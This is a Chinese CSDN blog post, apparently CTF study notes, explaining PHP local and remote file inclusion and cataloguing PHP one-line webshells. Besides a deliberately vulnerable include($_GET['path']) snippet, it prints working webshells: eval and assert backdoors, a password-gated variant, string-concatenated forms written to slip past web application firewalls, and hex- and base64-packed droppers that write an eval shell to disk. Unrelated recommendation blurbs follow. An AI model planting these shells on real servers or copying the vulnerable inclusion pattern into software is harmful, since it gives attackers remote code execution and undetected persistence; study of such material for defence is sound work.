Web 2

已于 2022-02-18 20:08:22 修改
阅读量131 收藏
点赞数
文章标签: 前端 php 开发语言
于 2022-02-18 20:05:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53896576/article/details/123009769
版权
本文详细介绍了PHP中的文件包含漏洞,包括本地文件包含(LFI)和远程文件包含(RFI),以及相关配置如allow_url_fopen和allow_url_include。此外,还讨论了一句话木马的常见形式和防范方法,例如eval、assert等函数的滥用,并展示了变形后门和灭杀后门的实例。
摘要由CSDN通过智能技术生成

一.文件包含

宗旨:将任何的php文件或者非php文件利用函数包含进php文件之后都会被当作php代码解析PHP提供一些函数来进行各个文件之间的相互引用,并提供了一些协议用于读取或者写入文件。

特殊文件包含:

最常⻅的使用:

include('flag.php')包含flag.php文件

* php代码执行的时候会写去访问flag.php,就好似把flag.php文件全部放在了当前文件,并且执行包含后的这个文件==============>不仅包含也会执行

其他函数:

include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile

#各种语言文件包含
#ASP ASPX PHP JSP Python Javaweb
<c:import url="http://...">
<jsp:include page="head.jsp"/>
<%@ include file="head.jsp"%>
<?php include ('test.php')?>

分类:

相关配置

本地文件包含 (LFI):可以读取与打开本地文件

远程文件包含 (RFI)(HTTP,FTP,PHP伪协议):可以远程加载文

php.ini文件:
本地:allow_url_fopen=On/Off
远程:allow_url_include=On/Off
<?php
if(isset($_GET['path'])){
    include $_GET['path'];
}else{
    echo "?path=info.php";
}
?>
本地:可通过相对路径方式找到文件
?path=info.php
远程:可通过http(s)或者ftp等方式远程加载文件
?path=http://......info.php
?path=ftp://....

allow_url_fopen = On allow_url_include = On

  • 本地文件包含:通过浏览器包含web服务器上的文件,这种漏洞是因为浏览器包含文件时没有进行严格的过滤允许遍历目录的字符注入浏览器并执行
  • 远程文件包含:就是允许攻击者包含一个远程的文件,一般是在远程服务器上预先设置好的脚本。 此漏洞是因为浏览器对用户的输入没有进行检查,导致不同程度的信息泄露、拒绝服务攻击 甚至在目标服务器执行代码。

?path=http://192.168.158.119/phpinfo.php

1.包含一句话木马:

将一句话写在一个文件中上传之后,在可以包含文件的php⻚面包含该文件,直接利用一句话

常⻅的一句话

eval :

  • 用来执行任意php代码
  • 用法:
<?php
eval($_POST[1]);
//1=system(ls);
?>

最常⻅的木⻢:

<?php
eval($_POS[1]);
?>

防爆破木⻢:

<?php
substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']);
?>
x=myh0st

过狗一句话:

<?php
($_=@$_GET[s]).@$_($_POST[hihack])
?> //s=assert
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[hihack]);
?>//将敏感函数通过.链接防止被检

不用 ? 的一句话远程:

<script language="php">eval ($_POST[hihack]);</script>

不用eval的一句话:

<?php
assert($_POST[1]);
?>
//具体看web1中的执行PHP代码函数的讲解

变形一句话后门:

<!--?php fputs 
(fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?-->
pack:pack(string $format, mixed ...$values): string //将输入参数打包成 format 格式的二进制字符串。6c6f7374776f6c662e706870//lostwolf.php
3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e//<?@eval($_POST[lostwolf])?>
<!--?php @ fputs (fopen(base64_decode('bXloMHN0LnBocA=='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydoaWhhY2snXSk7Pz4='));?-->

pack----->注意format代表的格式

灭杀一句话:

<!--?php $x="as"."se"."rt";$x($_POST["pass"]);?-->

Ing ing~
关注
【网络安全 | CTF】攻防世界 web2 解题详析
等风来
05-25 3603
可通过逆向加密算法的步骤,对 $miwen 进行相反的操作,即先使用 str_rot13 还原,然后使用 strrev 翻转,再使用 base64 解码,最后对每个字符的 ASCII 值减 1 ,再进行翻转即可得到 flag。其中,str_rot13 是一个简单的字符替换算法,将每个字符替换为它在字母表中向后移动 13 位后对应的字符。这个算法是一种经典的简单加密方法,可以用来隐藏字符串的真实含义。这段代码定义了一个函数 encode,接受一个字符串参数 $str,并返回对其进行加密后的结果。
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
【区块链】走进web3的世界-对于前端来说,web2与web3的区别
qq_23334071的博客
04-16 1854
web3与web2对于前端来说,只是对接的对象发生了变化,从后端API接口改为了智能合约。
ctf.show web2 最简单的SQL注入
m0_46412682的博客
07-12 5263
ctf.show web2 最简单的SQL注入 1、一开始的页面 随便输入用户名和密码看它怎么反应 没报错,只是清空了用户名和密码 题目提示是sql注入,那就用burpsuit抓个包,发送到repeater 点击go 既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,o
IDEA2023系列创建web项目
2202_75341355的博客
02-09 3705
系统的默认编码是GBK,而java的默认编码为UTF-8,tomcat9之前服务器默认使用GBK,在tomcat9之后,服务器使用UTF-8,所以dos命令窗口启动tomcat8服务器不会出现乱码(这里以tomcat8为例),在IDEA中启动控制台会出现乱码。我尝试过把tomcat10系统文件的默认编码格式改为GBK,然后在IDEA中解决乱码问题,虽然dos命令窗口乱码解决了,但是不知道为什么不能解决,所以我就没改,也不影响。点击Modules,选择要添加web的模块,点击上面的+号,选择web选项。
使用Docker部署web项目
H_porridge的博客
03-20 1万+
1、简介 本片文章主要介绍如何使用docker部署web项目。关于docker的安装及基本使用在笔者的另一篇文章中有相关的介绍。 链接 https://blog.csdn.net/H_porridge/article/details/123609120 2.准备一个web项目 自己有项目的可以用自己项目来部署,笔者此处也有一个web项目 https://pan.baidu.com/s/1l8ajTBvBU2Qw80JU-esbsw 提取码:1234 文件内容: 接着存放到操作系统中 3.部署mys
WebApi路由机制详解——看完不会用你打我
xiaouncle的博客
11-12 4万+
随着前后端分离的大热,WebApi在项目中的作用也是越来越重要,由于公司的原因我之前一直没有机会参与前后端分离的项目,但WebApi还是要学的呀,因为这东西确实很有用,可单独部署、与前端和App交互都很方便,既然有良好的发展趋势,我们当然应该顺势而为——搞懂WebApi! 从MVC到WebApi,路由机制一直都在其中扮演着重要的角色。 它可以很简单:如果你只需要会用一些简单的路由,如/Home...
常见的Web源码泄漏漏洞
huangyongkang666的博客
03-23 4158
常见的Web源码泄漏漏洞 1.Git 源码泄露 ​ 开发人员会使用 git 进行版本控制,对站点自动部署。但如果配置不当,可能会将 .git 文件夹直接部署到线上环境,这就引起了 git 泄露漏洞,我们可以利用这个漏洞直接获得网页源码 简要介绍git的目录结构 在一个目录中初始化一个仓库以后 , 会在这个目录下产生一个名叫 .git 的隐藏文件夹(版本库)这个文件夹里面保存了这个仓库的所有版本等一系列信息 一般来说 , 一个git仓库还存在这两个文件 : README.md (项目介绍) .gitign
Web3 方向有哪些工作,需要掌握哪些知识呢?
区块链技术头条
04-28 1707
综上所述,无论您选择Web3领域的哪个岗位,都需要构建全面的知识体系,既包括基础理论与核心技术,也涵盖特定岗位的专业技能。紧跟行业发展趋势,持续学习与实践,方能在Web3领域中游刃有余,发挥所长。投身Web3行业,无论您选择何种岗位,都需要构建一套涵盖基础理论、核心技术、生态应用与前沿趋势的知识体系。本文将对Web3工作者所需的整体知识进行阐述,并针对不同岗位的专业技能进行分类解析。
web页面中直接播放rtsp视频流
m0_69068051的博客
09-20 8407
web页面中直接播放rtsp视频流
web2py_cookbook
12-21
这是一个web2py的入门教程。是一位教师翻译的。(正好我现在用python来做一个类似于CruiseControl的持续集成工具(我的是适用于C++项目),后台自动编译、自动部署,自动测试服务都搞好了,就缺Web展现层,正好发现...
webview2加载本地页面
qq_25160759的博客
09-23 641
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 280
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
前端面试经验总结2(经典问题篇)
最新发布
rita_0567的博客
09-28 607
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
基于webComponents的纯原生前端框架
u013776700的博客
09-28 60
采用artComponent模板引擎,在数据更新后实现UI更新,当然这里做了优化处理,尽量减小页面渲染受影响的范围,实现最小化更新。基于框架,开发了一套常用UI组件,提升开发速度。组件库采用开放原则,也就是说别人都可以使用我的开发接口去开发组件库。我本人的个人开发web前端前框架xui,正在开发中,业已完成50%的核心开发工作,并且在开发过程中逐渐完善.目前框架未采用任何和市面上框架模式,没有打包过程,实现真实的开箱即用。框架完成了事件触发和事件监听的封装,在页面和组件事件处理上更加方便。
apply、call和bind的作用和区别
欢迎来到我的博客!我是一名全栈开发工程师,主攻前端开发。希望通过我的博客,能够与大家共同学习和成长。感谢您的关注和支持!
09-23 712
javascript中,apply、call和bind的作用和区别介绍。
grpcweb 客户端请求grpc-java服务器
nddjava的专栏
09-24 392
1. 定义grpc proto文件:HelloWorld.proto。5.grpc-web代理:nginx。3. grpc-web js生成。2. java grpc服务。4. grpc-web代码。
DC00015基于java web校园网上购物系统
黄昏下的黎明的博客
09-24 655
DC00015【含配套文档】基于java web校园网上购物系统。
web2py入门指南:从基础到实战
web2py入门教程》是一本详细介绍web2py框架的书籍,它在2007年发布后不断发展,历经四年时间更新至第4版,成为了开源web框架中的佼佼者,深受众多技术爱好者和开发者青睐。本书由云南大学信息学院无线创新实验室的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值